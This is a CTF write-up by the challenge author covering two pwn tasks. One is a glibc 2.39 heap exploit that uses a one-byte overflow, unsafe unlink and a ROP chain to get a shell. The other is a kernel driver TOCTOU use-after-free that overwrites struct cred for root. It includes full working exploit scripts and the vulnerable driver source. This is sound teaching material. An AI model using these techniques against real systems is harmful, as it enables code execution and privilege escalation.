ITFEST CTF 2025 is a one-day online/offline and jeopardy/scada style competition hosted by FR13NDS TEAM.

Table of contents

• Old Railway Station
• MAX MAX

1. Old Railway Station

Description

Old trick

Solution

Initial Checks

There is provided binary old_rs , libc.so.6 and ld-2.39.so files.

There is also provided meme.mp4 file inside of it there is fast phrase of: “Старый вокзалго мнау” meaning Old Railway Station :) (this is local meme created randomly, just rofl sound quality which makes laugh) -> meme.mp4

We can investigate old_rs by firstly using checksec to reveal security applied to this binary, also old_rs binary is stripped.

And to check the version of libc provided, we can see the ld-2.39.so file giving us the according version, or we can check it by: strings libc.so.6 | grep GLIBC and identify it as GLIBC 2.39

checksec:

GLIBC version:

So the binary is compiled with Full RELRO , Canary and NX enabled , No PIE

Meaning the GOT and PLT sections are Read Only, and the binary contains canary check every stack frame it leaves and the stack is not executable, but binary do not have PIE enabled, which gives us constant known addresses of the binary itself.

Lets investigate further by executing and checking what program does:

Binary prints the menu containing options:

1
  1. Issue New Ticket
2
  2. Modify Ticket Details
3
  3. Review Ticket Information
4
  4. Cancel Ticket
5
  5. Close Station for the Day

By the usage of each functions it seems for doing:

1. Creates ticket and asks for data for the ticket, then prints the index of created ticket
2. We can modify ticket by index with our data
3. Prints data within the ticket by index
4. Refunds (Cancels) the ticket by index
5. Exits from program

It is still not clear what it does actually when calling this options, specially the 1, 2, 3 and 4. So lets dive into reversing part, to analyze binary statically and dynamically.

Reverse / Vulnerability

Since I am a challenge author, I have the source code of the binary, but source code was not provided in the original task, so to be fair I will use original stripped binary as it is and reverse it.

There can be used any reverse engineering tools you prefer. For this task I will use Binary Ninja as decompilation tool and pwndbg for debugging.

Lets check what functions we have in the binary using Binary Ninja:

Based on the main() function there is loop which prints the menu every iteration, then prompts input using scanf for integer, using that output it matches the calls for corresponding functions. Loop ends when we exceed the i variable which responds to the counter of the executed options in the program, meaning each option usage increments it until it reaches 0xd then loop ends.

This part is optional, but I will rename the functions that was stripped to the corresponding names, based on the option menu print.

The function sub_401276 appears to be menu option which simply prints menu we saw earlier, so lets change it to that. sub_4012ef is function which is called when we choose option ‘1’ so lets change it to create_ticket. Then there is sub_4013d7 , sub_4014e7 , sub_4015ff , sub_401740 which is corresponding ‘2’ , ‘3’ , ‘4’ , ‘5’. Lets change them into edit_ticket , read_ticket , cancel_ticket , exit_prog.

Lets check what each functions do under the hood:

The create_ticket is eventually doing this:

1. Checks some global variable (lets rename it to max_tickets) for not exceeding 2, if it is then returns with print of tickets is overbooked
2. If the check passes, it creates chunk using calloc(1, 0x418), meaning that unsorted chunks are used and calloc fills the returned buffer with zeros
3. Stores chunk in the global chunks array (lets rename it to global_array) in the binary data section
4. Asks for input exact 0x418 bytes that will be stored in the chunk’s user data
5. Prints the global ticket (max_tickets) number and increments it

edit_ticket:

1. Asks for ticket number to modify
2. Checks ticket number for bigger than 0 and less or equal than global ticket number (max_tickets)
3. If the check passes, then checks the ticket inside of global chunks array (global_array) for not 0, if it is then prints that ticket was already cancelled
4. If the check passes, then it asks for input to modify the ticket data, we can write one byte more than 0x418, maximum write uo to 0x419 bytes in to the chunk

read_ticket:

1. Asks for ticket number to read
2. Checks ticket number for bigger than 0 and less or equal than global ticket number (max_tickets)
3. If the check passes, then checks the ticket inside of global chunks array (global_array) for not 0, if it is then prints that ticket was already cancelled
4. If the check passes, then writes the content of the ticket to stdout

cancel_ticket:

1. Checks some global variable (lets call it, is_free_used) for 0, if it is not then prints that cancellation is limited 1 per day
2. If the check passes, then asks for ticket number to cancel
3. Checks ticket number for bigger than 0 and less or equal than global ticket number (max_tickets)
4. If the check passes, then checks the ticket inside of global chunks array (global_array) for not 0, if it is then prints that ticket was already cancelled
5. If the check passes then frees the chunk and zeros the ticket inside of global chunks array (global_array)
6. Changes value of is_free_used to 1

exit_prog:

1. Prints that station is closed
2. Exits from program

That is almost everything we need to step further, the key things to mention that program allocates only unsorted bin chunks (0x418) meaning that no fastbin chunks are used, and size is high enough to not use tcache. And there is only 1 free usage per execution, meaning that we can only free once in the program (we can increase this limit later, but its not needed, we can pwn using only 1 free). Also there is global chunks array (global_array), that contains pointers to chunks in heap and can be accessed via corresponding ticket number in the program. We limited for option usage in 13 execution, as i mentioned for free usage it can be increased later, but we do not need to do that becasue 13 options is enough to pwn this program.

As you can see there is no Use after Free or Double free bugs type bugs, because it checks the global_array at the index to be not zero and zeros it after the free() usage, and usage of calloc() also zeros the chunks preventing us from potential heap/libc leaks using the uninitalized memory, there it will not leak anything using calloc.

But there is single byte overflow in the edit_ticket allowing us to overflow next chunk’s size field. We will use this strong primitive to exploit our binary in the Exploitation part.

Now we can write some wrapper python pwntools code to be able to easily communicate with the binary options:

1
from pwn import *
2

3
def malloc(p, data):
4
        p.sendlineafter(b'> ', b'1')
5
        p.sendafter(b': ', data)
6

7
def edit(p, index, data):
8
        p.sendlineafter(b'> ', b'2')
9
        p.sendlineafter(b': ', str(index).encode())
10
        p.sendafter(b': ', data)
11

12
def view(p, index):
13
        p.sendlineafter(b'> ', b'3')
14
        p.sendlineafter(b': ', str(index).encode())
15

16
def free(p, index):
17
        p.sendlineafter(b'> ', b'4')
18
        p.sendlineafter(b': ', str(index).encode())
19

20
exe = ELF('./old_rs')
21
libc = exe.libc
22
context.binary = exe
23
context.gdb_binary = 'pwndbg'
24
context.terminal = ["tmux", "splitw", "-h"]
25

26
p = gdb.debug([exe.path], '''continue''')
27

28
# we insert our exploit modification starting here
29

30
p.interactive()

I created this template using the behaviour of the functions, as you can see create_ticket become malloc() and cancel_ticket eventually become free() in our template, others did not changed in the context.

Lets dive into Exploitation part and see what we can achieve with single byte overflow in this program.

Part 1: Arbitrary Write

Firstly lets check that bug exist dynamically, via executing the binary with our template and add the overflow part, it should overflow ‘1’ chunk’s size field:

1
malloc(p, b'abc') # 0
2
malloc(p, b'def') # 1
3
malloc(p, b'123') # 2
4

5
payload = b''
6
payload += b'A' * 0x418 + b'\xff'
7

8
edit(p, 0, payload) # overflow next chunk's size field

Execute it and we can inspect the heap in pwndbg:

As you can see there is single byte overflow, which replaced first byte of the size field of next chunk by our last data ‘\xff’. Now we have Off By One primitive in the heap.

We are dealing with unsorted bin chunks, which is using double linked list structure - containing fd (forward pointer) and bk (backward pointer). And we are limited in chunk allocation by 3 and free usage by 1, so what we can do? We can use Unsafe Unlink technique which can be exploited in that condition which we have now.

Here is some theory:

1. When chunk is removed from unsorted bin, and previous chunk is also freed, malloc will do unlink() on this chunk, which eventually does:

1
  FD = P->fd;
2
  BK = P->bk;
3

4
  FD->bk = BK;
5
  BK->fd = FD;

It takes the Forward pointer (fd) of current chunk, replaces Backward pointer (bk) of it to the bk of current chunk. Then takes bk of current chunk, replaces fd of it to the fd of current chunk. Leading us arbitrary write if we control this pointers of unlinking chunk.

But there is a twist. Since our binary is linked in GLIBC 2.39, there is malloc integrity check introduced way before, which checks our unlinking process to mitigate such attacks or make it harder to exploit.

The check looks like this:

1
  assert(P->fd->bk == P);
2
  assert(P->bk->fd == P);

Meaning it assumes and verifies that our chunks fd’s bk is pointing to us, and our chunks bk’s fd is also pointing to us, mitigating the initial arbitrary write ability, but we still can use this technique in certain situations which requires some additions in binary or how the program deals with chunks.

2. To check if previous chunk is freed, malloc checks prev_in_use flag of the current chunk it accessing to, if its 0 then previous chunk is freed and unlink() can be called on this chunks.

To make believe for malloc that previous chunk is freed and to forge using unlink on our current chunk, we just need to somehow null the prev_in_use bit which is LSB bit of size field (ex. 0x421 = prev_in_use=1, 0x420=prev_in_use=0)

So now we have the idea of our exploitation, we can trigger unlink() on the chunk, if prev_in_use bit of current chunks is nulled, and we can basically get Arbitrary write by replacing the fd and bk pointers of the unlinking chunk, to arbritary location. But we need to deal with the security mitigation inside of GLIBC.

Remember that our chunks are stored in the global array (we called it global_array) and since binary is No PIE we can have its address in memory:

We can get use of that, since we know its address in runtime, we dont need any additional leaks in the first part of exploitation. The idea is to create fake chunk inside of the first chunk we allocate, to forge it to be valid for both fd and bk, pointing to global_array. Since unlink will check the corresponding fd and bk, we can craft such offset behind fd and bk so that it will point to our chunk, bypassing the integrity check:

1. We allocate 3 chunks (third is to not deal with top chunk consolidation)
2. We edit the first chunk and prepare our fake chunks inside, pointing to fd and bk to bypass double linked list check, and we overflow at the same time into thunk 2 replacing it’s prev_in_use bit to be 0, by simply putting 0x20 (size of chunk 2 will become 0x420)
3. Now we free chunk 2, since malloc sees prev_in_use is nulled, it will try to do unlink() in chunk 1, leading us to overwrite the first entry in the global_array to point itself, leading us the arbitrary write

Here is addition, we need also to put valid prev_size field of the chunk 2, because malloc checks the prev_size for corruption and gets the offset based on that, also we need to put -0x10 prev_size on it since we want to point the prev_size into our actual fake chunk, we need to substract the 0x10 from it and place while we overflow

Now I can add lines to exploit with additional comments as this, but now we change the payload and add free call:

1
malloc(p, b'abc') # 1-st usage option, 0 chunk
2
malloc(p, b'def') # 2-nd usage option, 1 chunk
3
malloc(p, b'123') # 3-rd usage option, 2 chunk
4

5
# 0x404050 - global_array
6
fd = 0x404050 - 0x18 # we point to -0x18 (24) since we faking our chunk and the unlink check will follow our fd, and find the first entry of chunk which is chunk number 0
7
bk = 0x404050 - 0x10 # same as fd, but +8 (since bk is 8 bytes after fd)
8
prev_size = 0x410 # as mentioned, we fake our prev_size to -0x10 of actual prev_size 0x420 to point to our fake chunk start
9
fake_size = 0x20 # overflow size, will become 0x420 in chunk number 1
10

11
payload = b''
12
payload += p64(0) # prev_size of previous chunk, we dont care for it
13
payload += p64(0x410) # size of chunk we faking
14
payload += p64(fd) + p64(bk) # fd and bk respectfully
15
payload += p8(0) * (0x418 - 40) # fill up to prev_size
16
payload += p64(prev_size) # faking prev_size to be 0x410
17
payload += p8(fake_size) # overflowing chunk 1 to replace 0x421 to 0x420, and null prev_in_use bit
18

19
edit(p, 0, payload) # 4-th usage option
20
free(p, 1) # 5-th usage option, 1 free usage, triggers unlink on chunk 0

We can execute it and check the memory around global_array, it should replace first entry with itself - 0x18 (should be 0x404038):

And yes we successfully gained arbitrary write on the global_array and we can now fake any address to point inside of this array, and then by choosing the ticket number we can edit, read the data within this pointers.

Part 2: Arbitrary Read and RCE

Now we have Arbitrary write on any address we provide inside of the global_array, which we control by editing the ticket (now it points to itself in ticket number 0, we can edit ticket and by the first entry we put our global_array address again, to persist the arbitary write primitive).

Since we dont have any addresses leaked (stack, libc) and only have binary addresses, thanks to No PIE, we need some kind of Arbitrary Read. And of course if we can replace pointers in the global_array, we eventually have Arbitrary Read also, because we can review ticket which will give data inside of the address. Using that we can get our libc leak just by classic reading the puts GOT, i will add this step to exploit script:

1
edit(p, 0, p64(0) * 3 + p64(0x404050) + p64(exe.got.puts)) # 6 usage option
2
view(p, 1) # 7 usage option, leaking libc
3

4
p.recvuntil(b'===\n')
5

6
puts_leak = u64(p.recv(6).ljust(8, b'\x00'))
7
libc.address = puts_leak - libc.sym.puts
8
print(f"Libc leak: {hex(puts_leak)}")
9
print(f"Libc address: {hex(libc.address)}")

Now we can leverage our Arbitrary Write in any form, there is no __free_hook or __malloc_hook’s available since its GLIBC 2.39 and it not contains that, but we can do several RCE on this version of libc. I prefered to use ROP chain into the stack RIP. This requires stack leak, so lets get it by leaking libc environ symbol which contains stack addresses:

1
edit(p, 0, p64(0x404050) + p64(libc.sym.environ)) # 8 usage option
2
view(p, 1) # 9 usage option
3

4
p.recvuntil(b'===\n')
5

6
environ = u64(p.recv(6).ljust(8, b'\x00'))
7
stack = environ - 360 # stack until nearly our RIP
8
print(f"Environ loc: {hex(environ)}")
9
print(f"Stack: {hex(stack)}")

Then we can calculate the offset until our RIP to start overwriting it and edit global_array to finalize our attack, it can be done via debugging, simply put breakpoint and inspect the stack nearly behind returning from the function, and compare with our stack leak:

1
edit(p, 0, p64(0x404050) + p64(stack + 24)) # 10 usage option

And whats left is just perform ROP chain by simply doing pop rdi for binsh address and jumping to system (we also needed to use ret_gadget, there will be movabs issue inside of system, which is stack allignment issue that can be solved via simply retting):

1
pop_rdi_ret = libc.address + 0x000000000010f78b
2
bin_sh_addr = next(libc.search(b'/bin/sh\x00'))
3
ret_gadget = libc.address + 0x000000000002882f
4

5
payload = flat(
6
        pop_rdi_ret,
7
        bin_sh_addr,
8
        ret_gadget,
9
        libc.sym.system
10
)
11
edit(p, 1, payload) # 11 usage option, final RCE, will overwrite RIP with our ROP chain and give us shell

After that we will have shell, and we can read the flag

Flag

f13{0ld_but_g0ld_s4f3_unl1nk_is_just_b4ck_t0_2000s}

Full Exploit Script

1
from pwn import *
2

3
def malloc(p, data):
4
        p.sendlineafter(b'> ', b'1')
5
        p.sendafter(b': ', data)
6

7
def edit(p, index, data):
8
        p.sendlineafter(b'> ', b'2')
9
        p.sendlineafter(b': ', str(index).encode())
10
        p.sendafter(b': ', data)
11

12
def view(p, index):
13
        p.sendlineafter(b'> ', b'3')
14
        p.sendlineafter(b': ', str(index).encode())
15

16
def free(p, index):
17
        p.sendlineafter(b'> ', b'4')
18
        p.sendlineafter(b': ', str(index).encode())
19

20
exe = ELF('./old_rs')
21
libc = exe.libc
22
context.binary = exe
23
context.gdb_binary = 'pwndbg'
24
context.terminal = ["tmux", "splitw", "-h"]
25

26
p = gdb.debug([exe.path], '''continue''')
27

28
malloc(p, b'abc') # 1-st usage option, 0 chunk
29
malloc(p, b'def') # 2-nd usage option, 1 chunk
30
malloc(p, b'123') # 3-rd usage option, 2 chunk
31

32
# 0x404050 - global_array
33
fd = 0x404050 - 0x18 # we point to -0x18 (24) since we faking our chunk and the unlink check will follow our fd, and find the first entry of chunk which is chunk number 0
34
bk = 0x404050 - 0x10 # same as fd, but +8 (since bk is 8 bytes after fd)
35
prev_size = 0x410 # as mentioned, we fake our prev_size to -0x10 of actual prev_size 0x420 to point to our fake chunk start
36
fake_size = 0x20 # overflow size, will become 0x420 in chunk number 1
37

38
payload = b''
39
payload += p64(0) # prev_size of previous chunk, we dont care for it
40
payload += p64(0x410) # size of chunk we faking
41
payload += p64(fd) + p64(bk) # fd and bk respectfully
42
payload += p8(0) * (0x418 - 40) # fill up to prev_size
43
payload += p64(prev_size) # faking prev_size to be 0x410
44
payload += p8(fake_size) # overflowing chunk 1 to replace 0x421 to 0x420, and null prev_in_use bit
45

46
edit(p, 0, payload) # 4-th usage option
47
free(p, 1) # 5-th usage option, 1 free usage, triggers unlink on chunk 0
48

49
edit(p, 0, p64(0) * 3 + p64(0x404050) + p64(exe.got.puts)) # 6 usage option
50
view(p, 1) # 7 usage option, leaking libc
51

52
p.recvuntil(b'===\n')
53

54
puts_leak = u64(p.recv(6).ljust(8, b'\x00'))
55
libc.address = puts_leak - libc.sym.puts
56
print(f"Libc leak: {hex(puts_leak)}")
57
print(f"Libc address: {hex(libc.address)}")
58

59
edit(p, 0, p64(0x404050) + p64(libc.sym.environ)) # 8 usage option
60
view(p, 1) # 9 usage option
61

62
p.recvuntil(b'===\n')
63

64
environ = u64(p.recv(6).ljust(8, b'\x00'))
65
stack = environ - 360 # stack until nearly our RIP
66
print(f"Environ loc: {hex(environ)}")
67
print(f"Stack: {hex(stack)}")
68

69
edit(p, 0, p64(0x404050) + p64(stack + 24)) # 10 usage option
70

71
pop_rdi_ret = libc.address + 0x000000000010f78b
72
bin_sh_addr = next(libc.search(b'/bin/sh\x00'))
73
ret_gadget = libc.address + 0x000000000002882f
74

75
payload = flat(
76
        pop_rdi_ret,
77
        bin_sh_addr,
78
        ret_gadget,
79
        libc.sym.system
80
)
81
edit(p, 1, payload) # 11 usage option, final RCE, will overwrite RIP with our ROP chain and give us shell
82

83
p.interactive()

Key Takeaways

• Understand binary behaviour
• Identify vulnerability - Off By One in the heap
• Bypass Unsafe Unlink security mitigations and perform Safe Unlink :)

References

• Unsafe Unlink in more details

2. MAX MAX

Description

TU TU TU TUTU

Solution

Initial Checks

There is provided vmlinux binary of kernel, and bzImage with initramfs.cpio.gz containing filesystem of the system, also there is source code of the driver and run.sh to run kernel image locally. So this is kernel pwn task.

After extracting the initramfs using cpio utility we can see the files init flag and maxmax_driver.ko - which seems to be compiled driver file of the source code which we have in the file maxmax_driver.c

Now we can read the source code of the kernel driver:

1
#include <linux/module.h>
2
#include <linux/kernel.h>
3
#include <linux/fs.h>
4
#include <linux/uaccess.h>
5
#include <linux/slab.h>
6
#include <linux/miscdevice.h>
7
#include <linux/delay.h>
8

9
#define DEVICE_NAME "maxmax_driver"
10
#define CMD_ALLOC 0xf1311
11
#define CMD_WRITE 0xf1312
12

13
struct maxmax_obj {
14
    char *buffer;
15
    size_t size;
16
};
17

18
static struct maxmax_obj *global_obj = NULL;
19

20
static long device_ioctl(struct file *file, unsigned int cmd, unsigned long arg) {
21
    struct maxmax_obj *obj = global_obj;
22

23
    switch (cmd) {
24
        case CMD_ALLOC: {
25
            size_t size;
26
            if (copy_from_user(&size, (void __user *)arg, sizeof(size)))
27
                return -EFAULT;
28
            if (size < 40) {
29
                return -EINVAL;
30
            }
31
            printk(KERN_INFO "Allocating size: %zu\n", size);
32

33
            if (obj->buffer) {
34
                kfree(obj->buffer);
35
            }
36

37
            obj->buffer = kmalloc(size, GFP_KERNEL);
38
            obj->size = size;
39

40
            if (!obj->buffer) return -ENOMEM;
41
            break;
42
        }
43

44
        case CMD_WRITE: {
45
            char *kbuf = obj->buffer;
46

47
            if (!kbuf) return -EINVAL;
48

49
            msleep(200);
50

51
            if (copy_from_user(kbuf, (void __user *)arg, 40))
52
                return -EFAULT;
53
            break;
54
        }
55

56
        default:
57
            return -EINVAL;
58
    }
59
    return 0;
60
}
61

62
static struct file_operations fops = {
63
    .unlocked_ioctl = device_ioctl,
64
};
65

66
static struct miscdevice misc_dev = {
67
    .minor = MISC_DYNAMIC_MINOR,
68
    .name = DEVICE_NAME,
69
    .fops = &fops,
70
};
71

72
static int __init maxmax_init(void) {
73
    global_obj = kmalloc(sizeof(struct maxmax_obj), GFP_KERNEL);
74
    global_obj->buffer = NULL;
75
    global_obj->size = 0;
76
    return misc_register(&misc_dev);
77
}
78

79
static void __exit maxmax_exit(void) {
80
    if (global_obj) {
81
        kfree(global_obj->buffer);
82
        kfree(global_obj);
83
    }
84
    misc_deregister(&misc_dev);
85
}
86

87
module_init(maxmax_init);
88
module_exit(maxmax_exit);
89

90
MODULE_LICENSE("GPL");
91
MODULE_AUTHOR("Aker");
92
MODULE_DESCRIPTION("ITFEST 2025 by FR13NDS TEAM");

This is simple kernel driver registered as maxmax_driver (we can use it via opening /dev/maxmax_driver), which defines two IOCTL commands, CMD_ALLOC (0xf1311) and CMD_WRITE (0xf1312).

There is also global object global_obj which contains a pointer to a buffer and its size.

CMD_ALLOC:

1. Reads size from user space.
2. Checks if the size is at least 40 bytes.
3. If a buffer is already allocated, it frees it.
4. Allocates a new buffer of the requested size and stores the pointer in global_obj -> buffer.

CMD_WRITE:

1. Retrieves the current buffer pointer from global_obj -> buffer.
2. Crucially, it performs an msleep(200), pausing execution for 200 milliseconds.
3. After the sleep, it copies 40 bytes of data from user space into the location pointed to global_obj -> buffer.

Vulnerability

Since in this driver ioctl does not protected via sync (mutex, spinlock) and not locked, there will be a Time of Check, Time of Use vulnerability (TOCTOU) that appears in the window between CMD_ALLOC and CMD_WRITE, the msleep function increases little bit this window creating us Race Condition which we can lead into full working Use After Free later.

In CMD_WRITE, the driver creates a local copy of the buffer pointer:

1
char *kbuf = obj->buffer; // 1. pointer is fetched
2
if (!kbuf) return -EINVAL;
3

4
msleep(200);              // 2. thread goes to sleep

While this thread is sleeping, a second thread can call CMD_ALLOC. This command will free the current buffer (the same one kbuf points to) and allocate a new one.

1
if (obj->buffer) {
2
    kfree(obj->buffer);
3
}

When the CMD_WRITE thread wakes up:

1
if (copy_from_user(kbuf, (void __user *)arg, 40)) // 3. writes to old pointer

It proceeds to write user data to kbuf, but kbuf is now a dangling pointer referring to freed memory giving us - Use After Free primitive.

UAF -> root

With the UAF primitive confirmed, the goal is to escalate privileges. Since we can write 40 bytes of arbitrary data to a freed object, we target the struct cred. The struct cred is the kernel structure that holds a process’s privileges (UID, GID, capabilities, etc.). If we can overwrite a process’s uid and gid fields with 0, that process becomes root.

The plan is:

1. We allocate a buffer of size 192 (the typical size of struct cred) using the driver.
2. Then we call CMD_WRITE. The driver stores the pointer to our buffer and goes to sleep (msleep(200)).
3. While Thread 1 is sleeping, we call CMD_ALLOC to free the buffer. The pointer held by Thread 1 is now dangling.
4. Spray the heap using fork().
   • fork() calls prepare_creds(), which allocates a new struct cred.
   • The kernel allocator (SLUB) is likely to reuse the chunk we just freed for one of these new cred structures.
5. Thread 1 wakes up and resumes execution, it will write our payload (40 bytes of zeros) to the dangling pointer.
   • this will overwrite the struct cred of one of the child processes.
   • since our payload consist of 40 zeros, the uid will be 0 and gid=0 (we become root).
6. We check child process if its UID is 0. If yes, then spawn a shell.

Now we can begin to write our exploit.

1. We define the target slab size and allocate it.

1
printf("fake victim obj (%d)\n", CRED_SIZE);
2
alloc(CRED_SIZE);

2. The thread performs the ioctl which saves the pointer and sleeps.

1
void* victim_write(void* arg) {
2
    ioctl(fd, CMD_WRITE, payload);
3
    return NULL;
4
}

3. The main thread waits just enough time (usleep(50000) = 50ms) to ensure the victim thread has entered the kernel and is sleeping, then triggers the free via re-allocation.

1
usleep(50000);
2
alloc(80);

4. fork() creates a new process, and every new process needs a struct cred.

1
for (int i=0; i<100; i++) {
2
    pid_t pid = fork();
3
    if (pid == 0) {
4
        usleep(250000);
5
        check_root_and_shell();
6
        exit(0);
7
    }
8
}

The child sleeps (usleep(250000)) to ensure it stays alive long enough for the victim_write thread (sleeping 200ms) to wake up and perform the overwrite.

5. The payload is 40 bytes of 0x00.

Flag

f13{tutututu_max_verstappen_f4st3st_it_was_easy_kernel_glhf_next_tasks}

Full Exploit Script

1
#define _GNU_SOURCE
2
#include <stdio.h>
3
#include <stdlib.h>
4
#include <unistd.h>
5
#include <fcntl.h>
6
#include <sys/ioctl.h>
7
#include <pthread.h>
8
#include <string.h>
9
#include <sys/wait.h>
10
#include <sys/types.h>
11

12
#define CMD_ALLOC 0xf1311
13
#define CMD_WRITE 0xf1312
14

15
#define CRED_SIZE 192
16

17
int fd;
18
char payload[CRED_SIZE];
19

20
void alloc(size_t size) {
21
    if (ioctl(fd, CMD_ALLOC, &size) < 0) {
22
        perror("[-] ioctl alloc failed");
23
        exit(1);
24
    }
25
}
26

27
void* victim_write(void* arg) {
28
    ioctl(fd, CMD_WRITE, payload);
29
    return NULL;
30
}
31

32
void check_root_and_shell() {
33
    if (getuid() == 0) {
34
        printf("\n!!! tu tu tu max verstappen %d (uid=%d)\n", getpid(), getuid());
35
        system("/bin/sh");
36
        exit(0);
37
    }
38
}
39

40
int main() {
41
    memset(payload, 0, sizeof(payload));
42
    fd = open("/dev/maxmax_driver", O_RDWR);
43
    if (fd < 0) {
44
        perror("[-] Failed to open driver");
45
        return 1;
46
    }
47
    printf("fake victim obj (%d)\n", CRED_SIZE);
48
    alloc(CRED_SIZE);
49

50
    pthread_t t1;
51
    pthread_create(&t1, NULL, victim_write, NULL);
52

53
    usleep(50000);
54

55
    printf("realloc trigger\n");
56
    alloc(80);
57

58
    printf("spray\n");
59
    int sprayed = 0;
60
    for (int i=0; i<100; i++) {
61
        pid_t pid = fork();
62
        if (pid == 0) {
63
            usleep(250000);
64
            check_root_and_shell();
65
            exit(0);
66
        }
67
        sprayed++;
68
    }
69

70
    pthread_join(t1, NULL);
71
    while(wait(NULL) > 0);
72

73
    printf("failed\n");
74
    return 0;
75
}

Key Takeaways

• Understand driver
• Identify vulnerability - TOCTOU to UAF
• Escalate privileges using struct cred

References

• Similar TOCTOU challenge
• TOCTOU in details